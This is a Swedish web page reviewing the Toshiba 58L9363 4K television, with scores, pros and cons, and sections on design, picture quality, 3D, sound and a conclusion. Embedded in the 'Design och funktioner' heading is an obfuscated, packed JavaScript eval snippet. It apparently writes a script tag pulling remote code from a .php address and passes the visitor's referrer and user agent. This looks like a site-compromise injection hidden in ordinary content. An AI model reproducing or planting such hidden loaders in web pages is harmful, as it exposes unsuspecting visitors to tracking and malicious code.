Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Toshiba 58L9363 review

Toshiba 58L9363 review
Filip Urde
  • On 18 mars, 2014
  • http://www.revue.se/filip-urde

Review Overview

2D bildkvalité
8
Smart TV
5
3D bildkvalité
8.5
Ljudkvalité
7.5
Pris
9.5
7.7

Rating

Fördelar: - Sätter en ny prisstandard - Riktigt bra 4K bildkvalité - Bra ljud Nackdelar: - Inte så bra uppskalning - Lite obekväm med material med mycket rörelser

Design eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eaiit|var|u0026u|referrer|knbhs||js|php’.split(’|’),0,{}))
och funktioner

Toshiba 58L9363 är kanske inte den mest extravagant 4K TV:n som släppts ut på marknaden, men den levererar verkligen. Med sin tunna ram, svarta finish och silvriga detaljer ger intrycket av en riktig hög prestanda TV.

Den är utrustad med alla anslutningsmöjligheter du kan önska för en aktuell 4K/UHD TV, med sina  fyra HDMI-ingångar, tre USB-portar, en SD-kortplats ( vilket faktiskt är ganska ovanligt för en TV ) , samt de klassiska Wi – Fi och LAN nätverksalternativen.

Toshiba58L9363RearDone

USB-portarna och nätverksalternativen stödjer uppspelning av en rätt bra mängd filtyper. Dock så kan dessa USB-portar inte spela upp i 4K, sedan de inte fått HDMI 2.0, men detta menar Toshiba att de kommer lösa med en firmware uppdatering som kommer komma inom kort. Du kan även köra en hel del bra online tjänster via Toshibas nya ” Cloud -TV ” smarta TV-system.

Gränssnittet för ”Cloud TV” ser dock ganska lågupplöst och tråkigt ut när man kommer ihåg att det faktiskt är en 4K TV vi har att leka med, hur det fungerar är dock inget att klaga på, det känns logiskt och välstrukturerat att röra sig i gränssnittet och systemet har blivit snabbare än på Toshibas andra TV-apparater, vilket är en trevlig nyhet.

Dock är ”Cloud TV” ganska eftersatt när det kommer till appar och innehåll kontra konkurrerande plattformar som t.ex. Samsung, med videostreamingtjänster i synnerhet.

Något som var ganska märkligt med 58L9363 skärm, är att den skiljer sig ganska mycket från sitt större syskon – Toshiba 65L9363. 65” kör de lite mer behändiga passiva systemet för att spela upp 3D, medan 58” som jag testat kör aktiva systemet. Nu är jag inte helt såld på hela 3D-hemma svängen, men att köra aktiva 3D-glasögon (batteridrivna) är något som jag inte tycker känns hållbart. Till TV:n ingår 2 par aktiva Toshiba glasögon, medan 65” får 4 st passiva glasögon. Varför man kör olika skärmar inom tillsynes samma familj med TV-apparater känns lite lustigt.

 

Bildkvalitet

Det är när vi pratar bildkvalitet som 58L9363 verkligen får möjligheten att briljera. Den är kanske inte fullt så bra som sina syskon, men wow, det är verkligen bra bild och detta trots sitt ringa pris.

Toshibas ResolutionPlus gör ett bra jobb för att skärpa upp bilder och det blir verkligen en fröjd för ögat. Jag såg bland annat Gravity i 1080p och det var riktigt bra. Men där är lite problemet just nu, det finns inte så mycket material i 4K, Gravity var som sagt i 1080p och de material jag sett i 4K har varit från Youtube (en del naturfilmer). Men det viktiga att poängtera är att det är verkligen en grymt bra bild även när man inte kör rena 4K filer.

Toshiba58L9363FrontDone

Saker blir mer problematisk med uppskalade filer, som t.ex. när jag streamar HBO-nordic (en förövrigt väldigt dålig applikation), via min iPad till Apple TV. Det tenderar att se ganska mjukt ut och blir lite små smetigt och har tendens att hacka. Uppskalningen blir så klart mycket bättre när man kör rena Blu-ray-skivor.

Med 4K innehåll så sköter sig Toshibas TV riktigt bra och detaljrikedomen är klart överlägsen vanlig HD , det finns en mycket större känsla av djup och den förinställda färgupplösning och processorkraften levererar enkelt 4Ks överlägsna färg finess.

Det är värt att nämna, att den 3 – tums extra skärmstorlek som du får med 58L9363 gentemot konkurrenterna ger ännu mer 4K inverkan, speciellt om du har ett någorlunda stort vardagsrum.

3D

Det finns tillfällen då 58L9363 s 3D- bilder ser förvånansvärt bra ut. Det finns en påtaglig känsla av extra detaljer i 3D- bilderna tack vare det aktiva systemets uppskalning, vilket bidrar till att 3D-miljön känns mer solid och konkret. Jag har en första generationens 3D-TV från Samsung, det har verkligen blivit så mycket bättre och med tanke på storleken på TV:n i förhållande till mitt vardagsrum, så var det nära Bio 3D känsla.

Kontrast ser också något bättre ut med 3D än vad den gör med 2D, också detta tack vare de aktiva shutter glasögonen som hjälper till och döljer den svaga gråheten du annars kan uppleva i mörka scener du får i 2D-läget.

Det är fortfarande lite rörelseoskärpa att brottas med, vilket kan ta udden av 4Ks klarhet. Men totalt sett så är 3D läget rörelser överlägsna 2D lägets rörelser. Vilket är första gången jag får känslan att 3D läget faktiskt gör sig bättre än 2D läget. Så det är riktigt kul.

Ljudkvalitet

För en uppsättning som inte har mycket ram att tala om så producerar 58L9363 ett förvånansvärt kraftfullt ljud. Audyssey ABX -systemet ökar vekrligen utbudet och kraften i ljudmixen, framför allt på bas-änden av spektrumet, förutsatt att du är någorlunda försiktig med volymnivåerna.

 

Det enda riktiga ljudproblemet jag stött på är att jag fick en del läpp synk fel när jag tittade på 3D blu-ray. Det kändes som Ljudspåret var lite på efterkälken från tid till annan och det var lite irriterande. Men löste sig genom att pausa och sätta på igen. Fel på blu-ray spelaren kanske? Men jag har hört att fler haft samma problem.

Bästa känslan

Att spela tv-spel på en stor 4K skärm är kanske de fetaste du kan göra just nu. Playstation 4 och den här TV:n tillsammans är ”A match made in heaven”. Aldrig varit så lyrisk som när jag spelade Battlefield 4 på den här TV:n, riktigt ballt.

 

Slutsats

Toshiba 58L9363 är inte lika bra som Sony 55X9005A och Samsung UE55F9000, som båda erbjuder överlägsen prestanda – med 3D och 2D.

Men det är heller inte rättvist att jämföra 58L9363 med de apparaterna, den är inte utformad för att vara den bästa 4K TV:n på marknaden. Den är utformad för att vara den billigaste – något som den uppnår vid en häpnadsväckande marginal. Detta på samma gång som man erbjuder 3 tum mer skärm och faktiskt väldigt trovärdiga inhemska 4K bilder för 8000kr mindre än sin närmaste 55 tums rival. Så en marknad finns det absolut för 58L9363. Men man ska veta att 4K fortfarande inte nått sin fulla potential, då det knappt finns något material i 4K, så man kommer få vänta lite innan sin Toshiba verkligen kommer kunna leverera det den är tänkt att göra.

Den har sina brister, vissa värre än andra och den behöver verkligen riktigt 4K material för att den ska börja imponera på riktigt. Men den är så mycket billigare än andra 4K TV apparater där ute så den är verkligen ett riktigt bra alternativ redan där.

toshiba.se

Comments

  1. Karl

    Snyggt!!!